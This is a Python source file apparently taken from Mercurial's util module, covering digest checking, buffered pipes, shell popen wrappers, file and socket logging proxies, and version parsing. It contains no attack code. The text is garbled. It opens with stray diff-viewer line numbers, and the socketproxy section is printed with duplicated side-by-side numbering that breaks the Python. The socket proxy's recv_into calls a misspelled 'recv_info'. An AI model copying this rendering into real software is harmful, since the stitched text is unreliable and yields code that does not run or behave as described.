191 return f(xs)
189 return f(xs)
192
190
def rapply(f, xs):
    """Apply function recursively to every item preserving the data structure

    >>> def f(x):
    ...     return 'f(%s)' % x
    >>> rapply(f, None) is None
    True
    >>> rapply(f, 'a')
    'f(a)'
    >>> rapply(f, {'a'}) == {'f(a)'}
    True
    >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
    ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]

    >>> xs = [object()]
    >>> rapply(pycompat.identity, xs) is xs
    True
    """
    if f is pycompat.identity:
        # fast path mainly for py2: identity means nothing to do, and the
        # caller gets the input object back unchanged (not a copy)
        return xs
    return _rapply(f, xs)
def bitsfrom(container):
    """Combine all values in ``container`` into one bitmask (bitwise OR)."""
    mask = 0
    for flag in container:
        mask |= flag
    return mask
# python 2.6 still have deprecation warning enabled by default. We do not want
# to display anything to standard user so detect if we are running test and
# only use python deprecation warning in this case.
_dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
if _dowarn:
    # explicitly unfilter our warning for python 2.7
    #
    # The option of setting PYTHONWARNINGS in the test runner was investigated.
    # However, module name set through PYTHONWARNINGS was exactly matched, so
    # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
    # makes the whole PYTHONWARNINGS thing useless for our usecase.
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
if _dowarn and pycompat.ispy3:
    # silence warning emitted by passing user string to re.sub()
    warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
                            r'mercurial')
    warnings.filterwarnings(r'ignore', r'invalid escape sequence',
                            DeprecationWarning, r'mercurial')
def nouideprecwarn(msg, version, stacklevel=1):
    """Issue an python native deprecation warning

    This is a noop outside of tests, use 'ui.deprecwarn' when possible.

    ``version`` names the last Mercurial release that keeps compatibility;
    ``stacklevel`` is bumped by one so the warning points at our caller.
    """
    if _dowarn:
        msg += ("\n(compatibility will be dropped after Mercurial-%s,"
                " update your code.)") % version
        warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
# Mapping of supported digest names to their hashlib constructors.
DIGESTS = {
    'md5': hashlib.md5,
    'sha1': hashlib.sha1,
    'sha512': hashlib.sha512,
}
# List of digest types from strongest to weakest
DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']

# sanity check: every entry in the strength ordering must be supported
for k in DIGESTS_BY_STRENGTH:
    assert k in DIGESTS
class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester([b'md5', b'sha1'])
    >>> d.update(b'foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d[b'md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d[b'sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred([b'md5', b'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=''):
        # one live hashlib object per requested digest name
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise error.Abort(_('unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        """Feed ``data`` into every tracked digest."""
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        if key not in DIGESTS:
            # BUG FIX: the message previously interpolated the module-level
            # loop variable 'k' (left over from the DIGESTS_BY_STRENGTH
            # sanity loop) instead of 'key', so the abort always reported
            # the wrong digest name.
            raise error.Abort(_('unknown digest type: %s') % key)
        return nodemod.hex(self._hashes[key].digest())

    def __iter__(self):
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""
        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None
class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
    size and digests.

        d = digestchecker(fh, size, {'md5': '...'})

    When multiple digests are given, all of them are validated.
    """

    def __init__(self, fh, size, digests):
        self._fh = fh
        self._size = size          # expected total byte count
        self._got = 0              # bytes read so far
        self._digests = dict(digests)
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        """Read from the wrapped handle, updating digests and byte count."""
        content = self._fh.read(length)
        self._digester.update(content)
        self._got += len(content)
        return content

    def validate(self):
        """Raise error.Abort if size or any expected digest does not match."""
        if self._size != self._got:
            raise error.Abort(_('size mismatch: expected %d, got %d') %
                              (self._size, self._got))
        for k, v in self._digests.items():
            if v != self._digester[k]:
                # i18n: first parameter is a digest name
                raise error.Abort(_('%s mismatch: expected %s, got %s') %
                                  (k, v, self._digester[k]))
try:
    # Python 2: reuse the builtin buffer()
    buffer = buffer
except NameError:
    # Python 3 has no buffer() builtin; emulate it with memoryview, which
    # likewise exposes a zero-copy view of the underlying data.
    def buffer(sliceable, offset=0, length=None):
        if length is None:
            return memoryview(sliceable)[offset:]
        return memoryview(sliceable)[offset:offset + length]
# Passed as close_fds= to subprocess.Popen in popen2/popen4 below; only
# enabled on POSIX (derived from pycompat.isposix).
closefds = pycompat.isposix

# Read granularity used by bufferedinputpipe._fillbuffer's os.read() calls.
_chunksize = 4096
class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us use buffered IO and lazy reading with 'polling' at
    the same time. We cannot probe the buffer state and select will not detect
    that data are ready to read if they are already buffered.

    This class let us work around that by implementing its own buffering
    (allowing efficient readline) while offering a way to know if the buffer is
    empty from the output (allowing collaboration of the buffer with polling).

    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """
    def __new__(cls, fh):
        # If we receive a fileobjectproxy, we need to use a variation of this
        # class that notifies observers about activity.
        if isinstance(fh, fileobjectproxy):
            cls = observedbufferedinputpipe

        return super(bufferedinputpipe, cls).__new__(cls)

    def __init__(self, input):
        self._input = input
        self._buffer = []     # buffered chunks, oldest first
        self._eof = False     # set once os.read() returns no data
        self._lenbuf = 0      # total byte length across all chunks

    @property
    def hasbuffer(self):
        """True is any data is currently buffered

        This will be used externally a pre-step for polling IO. If there is
        already data then no polling should be set in place."""
        return bool(self._buffer)

    @property
    def closed(self):
        return self._input.closed

    def fileno(self):
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        # keep reading from the OS until enough is buffered or EOF is hit
        while (not self._eof) and (self._lenbuf < size):
            self._fillbuffer()
        return self._frombuffer(size)

    def readline(self, *args, **kwargs):
        if 1 < len(self._buffer):
            # this should not happen because both read and readline end with a
            # _frombuffer call that collapse it.
            self._buffer = [''.join(self._buffer)]
            self._lenbuf = len(self._buffer[0])
        # lfi: index of the first newline in the most recent chunk, or -1
        lfi = -1
        if self._buffer:
            lfi = self._buffer[-1].find('\n')
        while (not self._eof) and lfi < 0:
            self._fillbuffer()
            if self._buffer:
                lfi = self._buffer[-1].find('\n')
        size = lfi + 1
        if lfi < 0: # end of file
            size = self._lenbuf
        elif 1 < len(self._buffer):
            # we need to take previous chunks into account
            size += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return ''
        buf = self._buffer[0]
        if 1 < len(self._buffer):
            # collapse all chunks into one before slicing
            buf = ''.join(self._buffer)

        data = buf[:size]
        buf = buf[len(data):]
        if buf:
            self._buffer = [buf]
            self._lenbuf = len(buf)
        else:
            self._buffer = []
            self._lenbuf = 0
        return data

    def _fillbuffer(self):
        """read data to the buffer"""
        data = os.read(self._input.fileno(), _chunksize)
        if not data:
            self._eof = True
        else:
            self._lenbuf += len(data)
            self._buffer.append(data)

        return data
def mmapread(fp):
    """Return a read-only mmap covering the whole of ``fp``.

    ``fp`` may be a file object (its fileno() is used) or a raw file
    descriptor.  Empty files cannot be mmapped; an empty string is returned
    for them so callers can treat the result uniformly.
    """
    try:
        fd = getattr(fp, 'fileno', lambda: fp)()
        return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
    except ValueError:
        # mmap raises ValueError for zero-length files; fall back to ''
        if os.fstat(fd).st_size == 0:
            return ''
        raise
def popen2(cmd, env=None, newlines=False):
    """Spawn ``cmd`` through the shell; return its (stdin, stdout) pipes."""
    # Setting bufsize to -1 lets the system decide the buffer size.
    # The default for bufsize is 0, meaning unbuffered. This leads to
    # poor performance on Mac OS X: http://bugs.python.org/issue4194
    p = subprocess.Popen(cmd, shell=True, bufsize=-1,
                         close_fds=closefds,
                         stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                         universal_newlines=newlines,
                         env=env)
    return p.stdin, p.stdout

def popen3(cmd, env=None, newlines=False):
    """Like popen4, but discard the Popen object and return only the pipes."""
    stdin, stdout, stderr, p = popen4(cmd, env, newlines)
    return stdin, stdout, stderr

def popen4(cmd, env=None, newlines=False, bufsize=-1):
    """Spawn ``cmd`` through the shell.

    Returns (stdin, stdout, stderr, Popen object).  bufsize=-1 means the
    system default buffer size (see popen2 for why unbuffered is avoided).
    """
    p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
                         close_fds=closefds,
                         stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE,
                         universal_newlines=newlines,
                         env=env)
    return p.stdin, p.stdout, p.stderr, p
class fileobjectproxy(object):
    """A proxy around file objects that tells a watcher when events occur.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, fh, observer):
        # bypass our own __setattr__, which forwards to the wrapped object
        object.__setattr__(self, r'_orig', fh)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        # Names handled by the proxy itself; all other attribute access
        # falls through, unobserved, to the wrapped file object.
        ours = {
            r'_observer',

            # IOBase
            r'close',
            # closed if a property
            r'fileno',
            r'flush',
            r'isatty',
            r'readable',
            r'readline',
            r'readlines',
            r'seek',
            r'seekable',
            r'tell',
            r'truncate',
            r'writable',
            r'writelines',
            # RawIOBase
            r'read',
            r'readall',
            r'readinto',
            r'write',
            # BufferedIOBase
            # raw is a property
            r'detach',
            # read defined above
            r'read1',
            # readinto defined above
            # write defined above
        }

        # We only observe some methods.
        if name in ours:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, r'_orig'), name)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, r'_orig'))

    __bool__ = __nonzero__

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __iter__(self):
        return object.__getattribute__(self, r'_orig').__iter__()

    def _observedcall(self, name, *args, **kwargs):
        # Call the original object.
        orig = object.__getattribute__(self, r'_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, r'_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    # Each proxied method below routes through _observedcall so the
    # observer sees the call and its result.

    def close(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'close', *args, **kwargs)

    def fileno(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'fileno', *args, **kwargs)

    def flush(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'flush', *args, **kwargs)

    def isatty(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'isatty', *args, **kwargs)

    def readable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readable', *args, **kwargs)

    def readline(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readline', *args, **kwargs)

    def readlines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readlines', *args, **kwargs)

    def seek(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seek', *args, **kwargs)

    def seekable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seekable', *args, **kwargs)

    def tell(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'tell', *args, **kwargs)

    def truncate(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'truncate', *args, **kwargs)

    def writable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writable', *args, **kwargs)

    def writelines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writelines', *args, **kwargs)

    def read(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read', *args, **kwargs)

    def readall(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readall', *args, **kwargs)

    def readinto(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readinto', *args, **kwargs)

    def write(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'write', *args, **kwargs)

    def detach(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'detach', *args, **kwargs)

    def read1(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read1', *args, **kwargs)
class observedbufferedinputpipe(bufferedinputpipe):
    """A variation of bufferedinputpipe that is aware of fileobjectproxy.

    ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
    bypass ``fileobjectproxy``. Because of this, we need to make
    ``bufferedinputpipe`` aware of these operations.

    This variation of ``bufferedinputpipe`` can notify observers about
    ``os.read()`` events. It also re-publishes other events, such as
    ``read()`` and ``readline()``.
    """
    def _fillbuffer(self):
        res = super(observedbufferedinputpipe, self)._fillbuffer()

        # notify the observer of the underlying os.read()
        fn = getattr(self._input._observer, r'osread', None)
        if fn:
            fn(res, _chunksize)

        return res

    # We use different observer methods because the operation isn't
    # performed on the actual file object but on us.
    def read(self, size):
        res = super(observedbufferedinputpipe, self).read(size)

        fn = getattr(self._input._observer, r'bufferedread', None)
        if fn:
            fn(res, size)

        return res

    def readline(self, *args, **kwargs):
        res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)

        fn = getattr(self._input._observer, r'bufferedreadline', None)
        if fn:
            fn(res)

        return res
# Socket methods intercepted by socketproxy so its observer is notified;
# any attribute not listed here is delegated straight to the wrapped socket.
PROXIED_SOCKET_METHODS = {
    r'gettimeout',
    r'makefile',
    r'recv',
    r'recv_into',
    r'recvfrom',
    r'recvfrom_into',
    r'send',
    r'sendall',
    r'sendto',
    r'setblocking',
    r'setsockopt',
    r'settimeout',
}
706 class socketproxy(object):
704 class socketproxy(object):
707 """A proxy around a socket that tells a watcher when events occur.
705 """A proxy around a socket that tells a watcher when events occur.
708
706
709 This is like ``fileobjectproxy`` except for sockets.
707 This is like ``fileobjectproxy`` except for sockets.
710
708
711 This type is intended to only be used for testing purposes. Think hard
709 This type is intended to only be used for testing purposes. Think hard
712 before using it in important code.
710 before using it in important code.
713 """
711 """
714 __slots__ = (
712 __slots__ = (
715 r'_orig',
713 r'_orig',
716 r'_observer',
714 r'_observer',
717 )
715 )
718
716
719 def __init__(self, sock, observer):
717 def __init__(self, sock, observer):
720 object.__setattr__(self, r'_orig', sock)
718 object.__setattr__(self, r'_orig', sock)
721 object.__setattr__(self, r'_observer', observer)
719 object.__setattr__(self, r'_observer', observer)
722
720
723 def __getattribute__(self, name):
721 def __getattribute__(self, name):
724 if name in PROXIED_SOCKET_METHODS:
722 if name in PROXIED_SOCKET_METHODS:
725 return object.__getattribute__(self, name)
723 return object.__getattribute__(self, name)
726
724
727 return getattr(object.__getattribute__(self, r'_orig'), name)
725 return getattr(object.__getattribute__(self, r'_orig'), name)
728
726
729 def __delattr__(self, name):
727 def __delattr__(self, name):
730 return delattr(object.__getattribute__(self, r'_orig'), name)
728 return delattr(object.__getattribute__(self, r'_orig'), name)
731
729
732 def __setattr__(self, name, value):
730 def __setattr__(self, name, value):
733 return setattr(object.__getattribute__(self, r'_orig'), name, value)
731 return setattr(object.__getattribute__(self, r'_orig'), name, value)
734
732
735 def __nonzero__(self):
733 def __nonzero__(self):
736 return bool(object.__getattribute__(self, r'_orig'))
734 return bool(object.__getattribute__(self, r'_orig'))
737
735
738 __bool__ = __nonzero__
736 __bool__ = __nonzero__
739
737
740 def _observedcall(self, name, *args, **kwargs):
738 def _observedcall(self, name, *args, **kwargs):
741 # Call the original object.
739 # Call the original object.
742 orig = object.__getattribute__(self, r'_orig')
740 orig = object.__getattribute__(self, r'_orig')
743 res = getattr(orig, name)(*args, **kwargs)
741 res = getattr(orig, name)(*args, **kwargs)
744
742
745 # Call a method on the observer of the same name with arguments
743 # Call a method on the observer of the same name with arguments
746 # so it can react, log, etc.
744 # so it can react, log, etc.
747 observer = object.__getattribute__(self, r'_observer')
745 observer = object.__getattribute__(self, r'_observer')
748 fn = getattr(observer, name, None)
746 fn = getattr(observer, name, None)
749 if fn:
747 if fn:
750 fn(res, *args, **kwargs)
748 fn(res, *args, **kwargs)
751
749
752 return res
750 return res
753
751
754 def makefile(self, *args, **kwargs):
752 def makefile(self, *args, **kwargs):
755 res = object.__getattribute__(self, r'_observedcall')(
753 res = object.__getattribute__(self, r'_observedcall')(
756 r'makefile', *args, **kwargs)
754 r'makefile', *args, **kwargs)
757
755
758 # The file object may be used for I/O. So we turn it into a
756 # The file object may be used for I/O. So we turn it into a
759 # proxy using our observer.
757 # proxy using our observer.
760 observer = object.__getattribute__(self, r'_observer')
758 observer = object.__getattribute__(self, r'_observer')
761 return makeloggingfileobject(observer.fh, res, observer.name,
759 return makeloggingfileobject(observer.fh, res, observer.name,
762 reads=observer.reads,
760 reads=observer.reads,
763 writes=observer.writes,
761 writes=observer.writes,
764 logdata=observer.logdata,
762 logdata=observer.logdata,
765 logdataapis=observer.logdataapis)
763 logdataapis=observer.logdataapis)
766
764
767 def recv(self, *args, **kwargs):
765 def recv(self, *args, **kwargs):
768 return object.__getattribute__(self, r'_observedcall')(
766 return object.__getattribute__(self, r'_observedcall')(
769 r'recv', *args, **kwargs)
767 r'recv', *args, **kwargs)
770
768
771 def recvfrom(self, *args, **kwargs):
769 def recvfrom(self, *args, **kwargs):
772 return object.__getattribute__(self, r'_observedcall')(
770 return object.__getattribute__(self, r'_observedcall')(
773 r'recvfrom', *args, **kwargs)
771 r'recvfrom', *args, **kwargs)
774
772
775 def recvfrom_into(self, *args, **kwargs):
773 def recvfrom_into(self, *args, **kwargs):
776 return object.__getattribute__(self, r'_observedcall')(
774 return object.__getattribute__(self, r'_observedcall')(
777 r'recvfrom_into', *args, **kwargs)
775 r'recvfrom_into', *args, **kwargs)
778
776
779 def recv_into(self, *args, **kwargs):
777 def recv_into(self, *args, **kwargs):
780 return object.__getattribute__(self, r'_observedcall')(
778 return object.__getattribute__(self, r'_observedcall')(
781 r'recv_info', *args, **kwargs)
779 r'recv_info', *args, **kwargs)
782
780
783 def send(self, *args, **kwargs):
781 def send(self, *args, **kwargs):
784 return object.__getattribute__(self, r'_observedcall')(
782 return object.__getattribute__(self, r'_observedcall')(
785 r'send', *args, **kwargs)
783 r'send', *args, **kwargs)
786
784
787 def sendall(self, *args, **kwargs):
785 def sendall(self, *args, **kwargs):
788 return object.__getattribute__(self, r'_observedcall')(
786 return object.__getattribute__(self, r'_observedcall')(
789 r'sendall', *args, **kwargs)
787 r'sendall', *args, **kwargs)
790
788
791 def sendto(self, *args, **kwargs):
789 def sendto(self, *args, **kwargs):
792 return object.__getattribute__(self, r'_observedcall')(
790 return object.__getattribute__(self, r'_observedcall')(
793 r'sendto', *args, **kwargs)
791 r'sendto', *args, **kwargs)
794
792
795 def setblocking(self, *args, **kwargs):
793 def setblocking(self, *args, **kwargs):
796 return object.__getattribute__(self, r'_observedcall')(
794 return object.__getattribute__(self, r'_observedcall')(
797 r'setblocking', *args, **kwargs)
795 r'setblocking', *args, **kwargs)
798
796
799 def settimeout(self, *args, **kwargs):
797 def settimeout(self, *args, **kwargs):
800 return object.__getattribute__(self, r'_observedcall')(
798 return object.__getattribute__(self, r'_observedcall')(
801 r'settimeout', *args, **kwargs)
799 r'settimeout', *args, **kwargs)
802
800
803 def gettimeout(self, *args, **kwargs):
801 def gettimeout(self, *args, **kwargs):
804 return object.__getattribute__(self, r'_observedcall')(
802 return object.__getattribute__(self, r'_observedcall')(
805 r'gettimeout', *args, **kwargs)
803 r'gettimeout', *args, **kwargs)
806
804
807 def setsockopt(self, *args, **kwargs):
805 def setsockopt(self, *args, **kwargs):
808 return object.__getattribute__(self, r'_observedcall')(
806 return object.__getattribute__(self, r'_observedcall')(
809 r'setsockopt', *args, **kwargs)
807 r'setsockopt', *args, **kwargs)
810
808
class baseproxyobserver(object):
    """Shared data-logging helper for the file/socket observers.

    Subclasses must provide ``fh`` (log file object), ``name`` (log line
    prefix), ``logdata`` (whether payload bytes are logged) and
    ``logdataapis`` (whether the API-call summary line is logged).
    """
    def _writedata(self, data):
        """Write ``data`` to the log, honoring the logdata* switches."""
        if not self.logdata:
            # Payload logging is off; just terminate the API summary line
            # (if one was started) and bail.
            if self.logdataapis:
                self.fh.write('\n')
                self.fh.flush()
            return

        # Simple case writes all data on a single line.
        if b'\n' not in data:
            if self.logdataapis:
                self.fh.write(': %s\n' % stringutil.escapedata(data))
            else:
                self.fh.write('%s> %s\n'
                              % (self.name, stringutil.escapedata(data)))
            self.fh.flush()
            return

        # Data with newlines is written to multiple lines.
        if self.logdataapis:
            self.fh.write(':\n')

        # splitlines(True) keeps the line endings so no bytes are lost.
        lines = data.splitlines(True)
        for line in lines:
            self.fh.write('%s> %s\n'
                          % (self.name, stringutil.escapedata(line)))
        self.fh.flush()
838
836
class fileobjectobserver(baseproxyobserver):
    """Logs file object activity."""
    def __init__(self, fh, name, reads=True, writes=True, logdata=False,
                 logdataapis=True):
        # fh: log destination; name: prefix identifying the observed object.
        self.fh = fh
        self.name = name
        self.logdata = logdata
        self.logdataapis = logdataapis
        self.reads = reads
        self.writes = writes

    def read(self, res, size=-1):
        """Log a read(); ``res`` is the data returned by the real call."""
        if not self.reads:
            return
        # Python 3 can return None from reads at EOF instead of empty strings.
        if res is None:
            res = ''

        if self.logdataapis:
            self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))

        self._writedata(res)

    def readline(self, res, limit=-1):
        """Log a readline(); ``res`` is the line that was returned."""
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readline() -> %d' % (self.name, len(res)))

        self._writedata(res)

    def readinto(self, res, dest):
        """Log a readinto(); ``res`` is the byte count, ``dest`` the buffer."""
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
                                                      res))

        # Only the bytes actually read are logged; res may be None on py3.
        data = dest[0:res] if res is not None else b''
        self._writedata(data)

    def write(self, res, data):
        """Log a write(); ``res`` is the real call's return value."""
        if not self.writes:
            return

        # Python 2 returns None from some write() calls. Python 3 (reasonably)
        # returns the integer bytes written.
        if res is None and data:
            res = len(data)

        if self.logdataapis:
            self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))

        self._writedata(data)

    def flush(self, res):
        """Log a flush()."""
        if not self.writes:
            return

        self.fh.write('%s> flush() -> %r\n' % (self.name, res))

    # For observedbufferedinputpipe.
    def bufferedread(self, res, size):
        """Log a buffered read performed by observedbufferedinputpipe."""
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedread(%d) -> %d' % (
                self.name, size, len(res)))

        self._writedata(res)

    def bufferedreadline(self, res):
        """Log a buffered readline performed by observedbufferedinputpipe."""
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedreadline() -> %d' % (
                self.name, len(res)))

        self._writedata(res)
922
920
def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
                          logdata=False, logdataapis=True):
    """Turn a file object into a logging file object.

    Returns a proxy around ``fh`` whose activity is logged to ``logh``,
    with each log line prefixed by ``name``. The keyword flags select
    which operations and how much payload data are recorded.
    """
    return fileobjectproxy(
        fh,
        fileobjectobserver(logh, name, reads=reads, writes=writes,
                           logdata=logdata, logdataapis=logdataapis))
930
928
class socketobserver(baseproxyobserver):
    """Logs socket activity.

    Each hook receives ``res`` (the real call's return value) first,
    because ``socketproxy._observedcall`` invokes observers as
    ``fn(res, *args, **kwargs)``.
    """
    def __init__(self, fh, name, reads=True, writes=True, states=True,
                 logdata=False, logdataapis=True):
        self.fh = fh
        self.name = name
        self.reads = reads
        self.writes = writes
        self.states = states
        self.logdata = logdata
        self.logdataapis = logdataapis

    def makefile(self, res, mode=None, bufsize=None):
        if not self.states:
            return

        self.fh.write('%s> makefile(%r, %r)\n' % (
            self.name, mode, bufsize))

    def recv(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv(%d, %d) -> %d' % (
                self.name, size, flags, len(res)))
        self._writedata(res)

    def recvfrom(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
                self.name, size, flags, len(res[0])))

        # res is a (data, address) pair; only the data is logged.
        self._writedata(res[0])

    def recvfrom_into(self, res, buf, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
                self.name, size, flags, res[0]))

        self._writedata(buf[0:res[0]])

    def recv_into(self, res, buf, size=0, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv_into(%d, %d) -> %d' % (
                self.name, size, flags, res))

        self._writedata(buf[0:res])

    def send(self, res, data, flags=0):
        if not self.writes:
            return

        if self.logdataapis:
            # Fixed: socket.send() returns the int count of bytes sent, so
            # res is logged directly (len(res) raised TypeError). The
            # logdataapis guard matches every other data method here.
            self.fh.write('%s> send(%d, %d) -> %d' % (
                self.name, len(data), flags, res))

        self._writedata(data)

    def sendall(self, res, data, flags=0):
        if not self.writes:
            return

        if self.logdataapis:
            # Returns None on success. So don't bother reporting return value.
            self.fh.write('%s> sendall(%d, %d)' % (
                self.name, len(data), flags))

        self._writedata(data)

    def sendto(self, res, data, flagsoraddress, address=None):
        if not self.writes:
            return

        # sendto() has two signatures: (data, address) and
        # (data, flags, address).
        if address:
            flags = flagsoraddress
        else:
            flags = 0

        if self.logdataapis:
            self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
                self.name, len(data), flags, address, res))

        self._writedata(data)

    def setblocking(self, res, flag):
        if not self.states:
            return

        self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))

    def settimeout(self, res, value):
        if not self.states:
            return

        self.fh.write('%s> settimeout(%r)\n' % (self.name, value))

    def gettimeout(self, res):
        if not self.states:
            return

        self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))

    def setsockopt(self, res, level, optname, value):
        # Fixed: the hook previously lacked the leading ``res`` parameter
        # that _observedcall passes (so any observed setsockopt raised
        # TypeError), and the format string had five conversions but only
        # four values.
        if not self.states:
            return

        self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
            self.name, level, optname, value, res))
1047
1045
def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
                      logdata=False, logdataapis=True):
    """Turn a socket into a logging socket.

    Returns a proxy around socket ``fh`` whose activity is logged to
    ``logh``, with each log line prefixed by ``name``. The keyword flags
    select which operations and how much payload data are recorded.
    """
    return socketproxy(
        fh,
        socketobserver(logh, name, reads=reads, writes=writes,
                       states=states, logdata=logdata,
                       logdataapis=logdataapis))
1056
1054
def version():
    """Return version information if available.

    Reads the generated ``__version__`` module; falls back to the string
    ``'unknown'`` when it has not been generated (e.g. running from a
    source checkout without a build step).
    """
    try:
        from . import __version__
    except ImportError:
        return 'unknown'
    return __version__.version
1064
1062
def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')
    """
    if not v:
        v = version()
    # Split the numeric part from the first '+' or '-' suffix. Use a raw
    # string: '\+' in a plain literal is an invalid escape sequence
    # (DeprecationWarning on modern Pythons); the runtime pattern is the
    # same.
    parts = remod.split(r'[\+-]', v, 1)
    if len(parts) == 1:
        vparts, extra = parts[0], None
    else:
        vparts, extra = parts

    vints = []
    for i in vparts.split('.'):
        try:
            vints.append(int(i))
        except ValueError:
            # Stop at the first non-numeric component (e.g. 'rc').
            break
    # (3, 6) -> (3, 6, None)
    while len(vints) < 3:
        vints.append(None)

    if n == 2:
        return (vints[0], vints[1])
    if n == 3:
        return (vints[0], vints[1], vints[2])
    if n == 4:
        return (vints[0], vints[1], vints[2], extra)
    # Any other n falls through and returns None (unchanged behavior).
1133
1131
def cachefunc(func):
